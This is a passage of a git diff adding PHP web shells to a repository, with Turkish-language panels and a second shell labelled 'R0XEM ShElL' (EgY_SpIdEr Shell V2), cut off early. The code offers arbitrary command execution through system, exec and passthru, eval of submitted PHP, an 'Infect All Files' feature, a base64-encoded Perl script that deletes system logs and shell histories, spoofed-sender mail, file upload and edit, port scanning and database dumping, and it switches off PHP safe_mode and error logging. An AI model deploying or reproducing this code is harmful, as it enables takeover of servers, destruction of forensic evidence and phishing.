gRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KICAgICAgIA0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcImxpbnV4XCIpeyAjSWYgbGludXggdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11MaW51eCBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRpID0gdW5saW5rIEBsaW51eDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJaWYoJGkpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7fSANCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCgkJfSAgICAgIA0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdW5vc1wiKXsgI0lmIHN1bm9zIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICBwcmludCBcIlsrXVN1bk9TIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgICRsID0gdW5saW5rIEBzdW5vczsNCiAgICAgICAgICAgICAgaWYoJGwpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9ICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgaWYoJG9zIGVxIFwiYWl4XCIpeyAjSWYgYWl4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICAgICBwcmludCBcIlsrXUFpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbSA9IHVubGluayBAYWl4Ow0KICAgICAgICAgICAgICBpZigkbSkgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgDQogICAgICAgICAgICAgIGlmKCRvcyBlcSBcImlyaXhcIil7ICNJZiBpcml4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0DQogICAgICAgICAgICAgIHByaW50IFwiWytdSXJpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbiA9IHVubGluayBAaXJpeDsgICANCiAgICAgICAgICAgICAgaWYoJG4pIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI01pc2MgTG9nIExvY2F0aW9ucyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICBAbWlzYyA9IChcIi9ldGMvaHR0cGQvbG9ncy9hY2Nlc3MubG9nXCIsIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZ1wiLFwiL2V0Yy9odHRwZC9sb2dzL2FjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yX2xvZ1wiLFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2FjY2Vzcy5sb2dcIixcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9hcGFjaGUvZXJyb3JfbG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLFwiL3Zhci9sb2cvYXBhY2hlL2Vycm9yLmxvZ1wiLFwiL3Zhci9sb2cvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9lcnJvcl9sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL3d3dy9sb2dzL2FjY2Vzcy5sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvd3d3L2xvZ3MvYWNjZXNzX2xvZ1wiKQ0KICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBPcGVuQlNEIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBvcGVuYnNkID0gKFwiL3Zhci93d3cvbG9nL2FjY2Vzc19sb2dcIiwgXCIvdmFyL3d3dy9sb2cvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRnJlZUJTRCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAZnJlZWJzZCA9IChcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvYWNjZXNzX2xvZ1wiLCBcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRGViaWFuIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBkZWJpYW4gPSAoXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLCBcIi92YXIvbG9nL2FwYWNoZS9lcnJvci5sb2dcIiwNCiAgICAgICBcIi92YXIvbG9nL2FwYWNoZS1zc2wvZXJyb3IubG9nXCIsIFwiL3Zhci9sb2cvYXBhY2hlLXNzbC9hY2Nlc3MubG9nXCIpDQogICAgICAgICAgIH0gICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VTRSBMaW51eCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAc3VzZSA9IChcIi92YXIvbG9nL2h0dHBkL2FjY2Vzc19sb2dcIiwgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBTb2xhcmlzIFN5c3RlbXMNCiAgIA0KICAgICAgeyAgIA0KICAgICAgIEBzb2xhcmlzID0gKFwiL3Zhci9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsIFwiL3Zhci9hcGFjaGUvbG9ncy9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMYW1wcCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAbGFtcHAgPSAoXCIvb3B0L2xhbXBwL2xvZ3MvZXJyb3JfbG9nXCIsIFwiL29wdC9sYW1wcC9sb2dzL2FjY2Vzc19sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBSZWQgSGF0LCBNYWMgT1MgWCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAcmVkaGF0ID0gKFwiL3Zhci9sb2cvaHR0cGQvYWNjZXNzX2xvZ1wiLCBcIi92YXIvbG9nL2h0dHBkL2Vycm9yX2xvZ1wiKQ0KICAgICAgICAgICB9DQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICNMb2dzIG9mIElyaXggU3lzdGVtcw0KICAgDQogICAgICB7DQogICAgICAgQGlyaXggPSAoXCIvdmFyL2FkbS9TWVNMT0dcIiwgXCIvdmFyL2FkbS9zdWxvZ1wiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL2xhc3Rsb2cvXCIsDQogICAgICAgICAgICBcIi91c3Ivc3Bvb2wvbHAvbG9nXCIsIFwiL3Zhci9hZG0vbHAvbHAtZXJyc1wiLCBcIi91c3IvbGliL2Nyb24vbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2xvZ2lubG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwgXCIvdmFyL2FkbS9kdG1wXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2FjY3Qvc3VtL2xvZ2lubG9nXCIsIFwidmFyL2FkbS9YMG1zZ3NcIiwgXCIvdmFyL2FkbS9jcmFzaC92bWNvcmVcIiwNCiAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jhc2gvdW5peFwiKQ0KICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZyBzb2YgQWl4IFN5c3RlbXMNCiAgICAgIHsgICANCiAgICAgIEBhaXggPSAoXCIvdmFyL2FkbS9wYWNjdFwiLCBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS9kdG1wXCIsIFwiL3Zhci9hZG0vcWFjY3RcIiwgICANCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS9yYXMvZXJybG9nXCIsIFwiL3Zhci9hZG0vcmFzL2Jvb3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jvbi9sb2dcIiwgXCIvZXRjL3V0bXBcIiwgXCIvZXRjL3NlY3VyaXR5L2xhc3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL2V0Yy9zZWN1cml0eS9mYWlsZWRsb2dpblwiLCBcInVzci9zcG9vbC9tcXVldWUvc3lzbG9nXCIpICAgDQogICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VuT1MgU3lzdGVtcyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgQHN1bm9zID0gKFwiL3Zhci9hZG0vbWVzc2FnZXNcIiwgXCIvdmFyL2FkbS9hY3Vsb2dzXCIsIFwiL3Zhci9hZG0vYWN1bG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS92b2xkLmxvZ1wiLCBcIi92YXIvYWRtL3d0bXBcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvYWRtL2xvZy9hc3BwcC5sb2dcIiwgXCIvdmFyL2xvZy9zeXNsb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9QT1Bsb2dcIiwgXCIvdmFyL2xvZy9hdXRobG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xwL2xvZ3MvbHBzY2hlZFwiLCBcIi92YXIvbHAvbG9ncy9yZXF1ZXN0c1wiLA0KICAgICAgICAgICAgICBcIi92YXIvY3Jvbi9sb2dzXCIsIFwiL3Zhci9zYWYvX2xvZ1wiLCBcIi92YXIvc2FmL3BvcnQvbG9nXCIpDQogICAgICAgICB9ICAgICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMaW51eCBTeXN0ZW1zICAgICAgIA0KICAgICAgeyAgICAgDQogICAgICAgQGxpbnV4ID0gKFwiL3Zhci9sb2cvbGFzdGxvZ1wiLCBcIi92YXIvbG9nL3RlbG5ldGRcIiwgXCIvdmFyL3J1bi91dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvc2VjdXJlXCIsXCIvcm9vdC8ua3NoX2hpc3RvcnlcIiwgXCIvcm9vdC8uYmFzaF9oaXN0b3J5XCIsDQogICAgICAgICAgICAgICAgIFwiL3Jvb3QvLmJhc2hfbG9ndXRcIiwgXCIvdmFyL2xvZy93dG1wXCIsIFwiL2V0Yy93dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9ydW4vdXRtcFwiLCBcIi9ldGMvdXRtcFwiLCBcIi92YXIvbG9nXCIsIFwiL3Zhci9hZG1cIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FwYWNoZS9sb2dcIiwgXCIvdmFyL2FwYWNoZS9sb2dzXCIsIFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9nc1wiLA0KICAgICAgICAgICAgICAgICBcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3NcIiwgXCIvdmFyL2xvZy9hY2N0XCIsIFwiL3Zhci9sb2cveGZlcmxvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL21lc3NhZ2VzL1wiLCBcIi92YXIvbG9nL3Byb2Z0cGQveGZlcmxvZy5sZWdhY3lcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9wcm9mdHBkLnhmZXJsb2dcIiwgXCIvdmFyL2xvZy9wcm9mdHBkLmFjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIiwgXCIvdmFyL2xvZy9odHRwc2Qvc3NsX2xvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL2h0dHBzZC9zc2wuYWNjZXNzX2xvZ1wiLCBcIi9ldGMvbWFpbC9hY2Nlc3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9xbWFpbFwiLCBcIi92YXIvbG9nL3NtdHBkXCIsIFwiL3Zhci9sb2cvc2FtYmFcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9zYW1iYS5sb2cuJW1cIiwgXCIvdmFyL2xvY2svc2FtYmFcIiwgXCIvcm9vdC8uWGF1dGhvcml0eVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL3BvcGxvZ1wiLCBcIi92YXIvbG9nL25ld3MuYWxsXCIsIFwiL3Zhci9sb2cvc3Bvb2xlclwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuYWxsXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmV3cy9uZXdzLmNyaXRcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuZXJyXCIsIFwiL3Zhci9sb2cvbmV3cy9uZXdzLm5vdGljZVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3Mvc3Vjay5lcnJcIiwgXCIvdmFyL2xvZy9uZXdzL3N1Y2subm90aWNlXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9zcG9vbC90bXBcIiwgXCIvdmFyL3Nwb29sL2Vycm9yc1wiLCBcIi92YXIvc3Bvb2wvbG9nc1wiLCBcIi92YXIvc3Bvb2wvbG9ja3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdXNyL2xvY2FsL3d3dy9sb2dzL3RodHRwZF9sb2dcIiwgXCIvdmFyL2xvZy90aHR0cGRfbG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmNmdHBkL21pc2Nsb2cudHh0XCIsIFwiL3Zhci9sb2cvbmN0ZnBkLmVycnNcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9hdXRoXCIpDQogICAgICAgICB9DQogICAgICAgICANCiAgIA==");
+$openp = fopen("logseraser.pl", "w+")or die("Error");
+fwrite($openp, $erase)or die("Error");
+fclose($openp);
+$aidx = passthru("perl logseraser.pl ".$_POST['functionp']);
+unlink("logseraser.pl");
+echo "</textarea>";
+}
+
+if(isset($_POST['commex']))
+{
+echo "<tr><td>
+<center><b><font size='2' face='Verdana'>CMD :]<br></font></b>
+        <input name=cmd size=20 type=text> 
+        <select name=functionz>
+          <option>passthru</option>
+          <option>popen</option>
+          <option>exec</option>
+          <option>shell_exec</option>
+          <option>system</option>
+        </select><br><input type='submit' name='cmdex' value='Enter'></table>";
+   }
+   if(isset($_POST['cmdex']))
+   { echo "<tr><td>";
+   switch (@$_POST['functionz']) {
+	case "system":
+	system(stripslashes($_POST['cmd']));
+	
+	break;
+	case "popen":
+	$handle = popen($_POST['cmd'].' 2>&1', 'r');
+	echo "'$handle'; " . gettype($handle) . "\n";
+	$read = fread($handle, 2096);
+	echo $read;
+	pclose($handle);
+	
+	break;
+	case "shell_exec":
+	shell_exec(stripslashes($_POST['cmd']));
+	
+
+	break;
+	case "exec":
+	exec(stripslashes($_POST['cmd']));
+	
+	break;
+	case "passthru":
+	passthru(stripslashes($_POST['cmd']));
+	
+	}
+	}
+
+elseif(isset($_POST['mail'])) 
+{
+echo "<form method='post' action=''>
+<td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onaylı]</font></center>
+<center><font face='Verdana' size='1'>Kime:<br>
+<input type='text' size='19' name='mto'><br>
+Kimden:<br>
+<input type='text' size='19' name='mfrom'><br>
+Konu:<br>
+<input type='text' size='19' name='mobj'><br>
+Mesaj:<br>
+<textarea name='mtext' cols=20 rows=4></textarea><br>
+<br><input type='submit' value='Yolla' name='senm'>
+</form></table><br>";}
+if(isset($_POST['senm'])) 
+{
+//Mail With HTML   <- webcheatsheet.com
+$to = $_POST['mto'];
+$subject = $_POST['mobj'];
+$contentz = $_POST['mtext']."<!--";
+$random_hash = md5(date('r', time()));
+$headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom'];
+$headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\"";
+ob_start(); 
+?>
+
+--PHP-alt-<?php echo $random_hash; ?> 
+Content-Type: text/html; charset="iso-8859-1"
+Content-Transfer-Encoding: 7bit
+
+<?  echo "$contentz"; ?>
+--PHP-alt-<?php echo $random_hash; ?>--
+<?
+$message = ob_get_clean();
+
+$mail = @mail( $to, $subject, $message, $headers );
+
+if($mail) { echo "<br><td valign=top>
+<center><font color='green' size='1'>Mail Sent</font></center></table>"; }
+else { echo "<br><td valign=top>
+<center><font color='red' size='1'>Error</font></center></table>"; }
+}
+
+elseif(isset($_POST['encoder'])) { 
+//Encoder
+echo "<form method='post' action=''><td valign=top>
+<center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>"; 
+}
+if(isset($_POST['encode'])) { echo "<td valign=top>
+<center><font face='Verdana' size='1'>
+MD5:   &nbsp;&nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".md5($_POST['encod'])."'><br>
+Sha1:  &nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".sha1($_POST['encod'])."'><br>
+Crc32: &nbsp;&nbsp;&nbsp;<input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br>
+Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br>
+Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";}
+
+//File List
+echo "</table><table width=100%><tr><td>
+<center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table>
+<center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0>
+<font size='1'>
+<td valign=top><font face='Verdana' size='2'><b>Dosya Adı :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font>
+</table></center>"; 
+
+echo "
+<br>
+<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top>
+<center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>";
+if(!isset($phpeval))
+{
+echo "
+   <form method='post' action=''>
+   <textarea name=php_eval cols=100 rows=5></textarea><br>
+   <input type='submit' value='Calistir!'>
+   </form>
+";
+}
+
+if(isset($phpeval)) {
+echo "
+<form method='post' action=''>
+<textarea name=php_eval cols=100 rows=10>";
+$wr = '"';
+ $eval = @str_replace("<?","",$phpeval);
+ $eval = @str_replace("?>","",$phpeval);
+ @eval($eval);
+echo "</textarea><br><input type='submit' value='Calistir!'></form>";
+
+}
+echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>";
+if(isset($textzz)) { echo $textzz; }
+if(isset($textz0)) { echo $textz0; }
+echo "</center></form></td></tr><tr><td>
+<center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>
+<form method='post' action=''>
+<input type='text' name='editfile' value=".$dir.">
+<input type='submit' value='Go' name='doedit'>
+</form>";
+// Edit Files n3xpl0rer
+if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
+{
+$file = $_POST['editfile'];
+$content = file_get_contents($file);
+echo "<form action='' method='post'><center>
+<input type='hidden' name='editfile' value='".$file."'>
+<textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>";
+}
+if(isset($_POST['edit'])) {
+$file = $_POST['editfile'];
+echo  $file."<br />";
+$fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
+fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>");
+fclose($fh);
+echo "Done.</td></tr>";
+}
+echo "
+</table>
+<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
+<tr>
+<td valign=top>
+<center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>
+<form name='directory' method='post' action=''>
+<input type='text' name='dir' value=$dir>
+<input type='submit' value='Go'>
+</form></td><td>
+<center><b><font size='2' face='Verdana'> Port Tarayıcı <br></font></b>
+   <form name='scanner' method='post'>
+   <input type='text' name='host' value='127.0.0.1' >
+   <select name='protocol'>
+   <option value='tcp'>tcp</option>
+   <option value='udp'>udp</option>
+   </select>
+   <input type='submit' value='Portları TARA'>
+   </form>
+";
+if(isset($host) && isset($proto))
+{
+echo "<font size='2' face='Verdana'>Open Ports:";
+
+for($current = 0; $current <= 23; $current++)
+{
+$currents = $myports[$current];
+
+$service = getservbyport($currents, $proto);
+
+
+// Try to connect to port
+$result = fsockopen($host, $currents, $errno, $errstr, 1);
+
+// Show results
+if($result)
+{
+echo "$currents, ";
+}
+
+
+}
+}
+
+echo "</font>
+</td></tr>
+
+<tr>
+<td valign=top width=50%>
+<center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>
+   <form method='post' action='' enctype='multipart/form-data'>
+   <input type='hidden' name='dare' value=$dir>
+   <input type='file' name='ffile'>
+   <input type='submit' name='ok' value='Upload!'>
+   </center>   
+   </form>
+</td>
+<td valign=top>
+<center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>
+   <form method='post' action=''>
+   <input type='text' name='delete' value=$dir > <input type='submit' value='Dosyayı Sil' name='deletfilez'>
+   </center>
+   </form>
+</td></tr>
+<tr>
+<td valign=top>
+ 
+<center><b><font size='2' face='Verdana'>Klasör Oluştur<br></font></b>
+   <form method='post' action=''>
+   <input type='text' name='makedir' value=$dir> <input type='submit' value='Oluştur'>
+   </center>
+   </form>
+</td>
+<td valign=top>
+<center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b>
+   <form method='post' action=''>
+   <input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'>
+   </center>
+   </form>
+</td></tr>
+<tr>
+<td valign=top width=50%>
+<center><b><font size='2' face='Verdana'>Dosya Oluştur:<br></font></b>
+   <form method='post' action=''>
+   <input type='hidden' name='darezz' value=$dir>
+   <font size='1' face='Verdana'>ADI:</font><br>
+   <input type='text' name='names' size='30'><br>
+   <font size='1' face='Verdana'>Kodu:</font><br>
+   <textarea rows='16' cols='30' name='source'></textarea><br>
+   <input type='submit' value='Upload'>
+   </center>
+   </form>
+</td>
+<td valign=top width=50%>
+<center><b><font size='2' face='Verdana'>Database<br></font></b>
+   <form method='post' action=''>
+   <font size='1' face='Verdana'>Username: - Password:</font><br>
+   <input type='text' name='user' size='10'>
+   <input type='text' name='passd' size='10'><br>
+   <font size='1' face='Verdana'>Host:</font><br>
+   <input type='text' name='host' value='localhost'><br>
+   <font size='1' face='Verdana'>DB Name:</font><br>
+   <input type='text' name='db'><br>
+   <font size='1' face='Verdana'>Sorgu:</font><br>
+   <textarea rows='10' cols='30' name='query'></textarea><br>
+   <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'>
+   </center>
+   </form>
+</td> </tr>
+
+</table>
+</table>
+<br />
+<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
+<tr>
+<td valign=top>
+<center><b><font size='1' face='Verdana'>
+CW Exploiter TIM // Cyber Security
+</center></font></td></tr>
+</body>
+</html>";
+
+
+?>
diff --git a/php/R0XEM ShElL.php b/php/R0XEM ShElL.php
new file mode 100644
index 0000000..f635af7
--- /dev/null
+++ b/php/R0XEM ShElL.php	
@@ -0,0 +1,6485 @@
+<?###########################################
+#           EgY_SpIdEr ShElL V2           #
+#            EgY_SpIdEr                   #
+#          www.egyspider.eu             #
+###########################################
+
+
+//Change User & Password
+
+
+$tacfgd['uname'] = 'Admin'; #CHANGME
+$tacfgd['pword'] = 'Password'; #CHANGME
+
+
+
+
+// Title of page.
+$tacfgd['title'] = 'R0XEM ShElL';
+
+
+// Text to appear just above login form.
+$tacfgd['helptext'] = 'R0XEM ShElL';
+
+
+
+
+// Set to true to enable the optional remember-me feature, which stores encrypted login details to 
+// allow users to be logged-in automatically on their return. Turn off for a little extra security.
+$tacfgd['allowrm'] = true;
+
+
+// If you have multiple protected pages, and there's more than one username / password combination, 
+// you need to group each combination under a distinct rmgroup so that the remember-me feature 
+// knows which login details to use.
+$tacfgd['rmgroup'] = 'default';
+
+
+// Set to true if you use your own sessions within your protected page, to stop txtAuth interfering. 
+// In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not 
+// destroy the session, so that is left up to you.
+$tacfgd['ownsessions'] = false;
+
+
+
+
+
+
+
+
+foreach ($tacfgd as $key => $val) {
+  if (!isset($tacfg[$key])) $tacfg[$key] = $val;
+}
+
+
+if (!$tacfg['ownsessions']) {
+  session_name('txtauth');
+  session_start();
+}
+
+
+// Logout attempt made. Deletes any remember-me cookie as well
+if (isset($_GET['logout']) || isset($_POST['logout'])) {
+  setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
+  if (!$tacfg['ownsessions']) {
+    $_SESSION = array();
+    session_destroy();
+  }
+  else $_SESSION['txtauthin'] = false;
+}
+// Login attempt made
+elseif (isset($_POST['login'])) {
+  if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
+    $_SESSION['txtauthin'] = true;
+    if ($_POST['rm']) {
+      // Set remember-me cookie for 2 weeks
+      setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
+    }
+  }
+  else $err = 'Login Faild !';
+}
+// Remember-me cookie exists
+elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
+  if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
+    $_SESSION['txtauthin'] = true;
+  }
+  else $err = 'Login Faild !';
+}
+if (!$_SESSION['txtauthin']) {
+@ini_restore("safe_mode");
+@ini_restore("open_basedir");
+@ini_restore("safe_mode_include_dir");
+@ini_restore("safe_mode_exec_dir");
+@ini_restore("disable_functions");
+@ini_restore("allow_url_fopen");
+
+
+@ini_set('error_log',NULL);
+@ini_set('log_errors',0);
+?>
+<html dir=rtl>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title><?=$tacfg['title']?></title>
+
+
+<STYLE>
+
+
